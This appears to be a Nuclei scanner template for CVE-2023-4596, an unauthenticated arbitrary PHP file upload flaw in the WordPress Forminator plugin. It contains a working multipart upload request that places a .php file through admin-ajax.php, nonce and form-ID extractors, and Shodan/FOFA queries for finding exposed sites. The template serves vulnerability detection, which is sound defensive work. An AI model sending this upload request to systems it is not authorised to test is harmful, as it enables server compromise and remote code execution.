id: CVE-2023-4596 info: name: WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload author: E1A severity: critical description: | The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. impact: | Unauthenticated attackers can upload arbitrary files including malicious PHP code, potentially leading to complete server compromise and remote code execution. remediation: | Update the Forminator plugin to version 1.24.7 or later which includes proper file type validation. reference: - https://www.exploit-db.com/exploits/51664 - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve - https://plugins.trac.wordpress.org/changeset/2954409/forminator/trunk/library/fields/postdata.php - https://github.com/E1A/CVE-2023-4596 - https://nvd.nist.gov/vuln/detail/CVE-2023-4596 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-4596 cwe-id: CWE-434 epss-score: 0.12749 epss-percentile: 0.95766 cpe: cpe:2.3:a:incsub:forminator:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: incsub product: forminator framework: wordpress shodan-query: http.html:/wp-content/plugins/forminator fofa-query: body=/wp-content/plugins/forminator publicwww-query: - /wp-content/plugins/Forminator - /wp-content/plugins/forminator tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub,vkev,vuln variables: string: "CVE-2023-4596" http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | @timeout: 15s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="textarea-1" {{randstr}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="phone-1" {{rand_int(10)}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="email-1" test@gmail.com ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="name-1" {{randstr}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}.php" Content-Type: application/x-php ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="forminator_nonce" {{forminator_nonce}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="form_id" {{form_id}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="current_url" {{BaseURL}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="action" forminator_submit_form_custom-forms ------WebKitFormBoundaryBLOYSueQAdgN2PRe matchers-condition: and matchers: - type: word part: body_1 words: - 'Upload file' - 'forminator-field-upload' condition: and - type: word part: body_2 words: - '{"success":true' - '"form_id":"{{form_id}}"' - '"behav' condition: and - type: status status: - 200 extractors: - type: regex name: forminator_nonce part: body group: 1 regex: - 'name="forminator_nonce" value="([a-z0-9]+)" \/>' internal: true - type: regex name: form_id part: body group: 1 regex: - 'name="form_id" value="([0-9]+)">' internal: true # digest: 4a0a0047304502206f4c6670d8753f4c383ad8147c54246d9ea4b39c996bb99dd9985dd49d88c17e022100c6b19dea43fe4c8a71b27d53d8831ef507b2bfe079a204e1e9afe91cda00f2ea:922c64590222798bb761d5b6d8e72950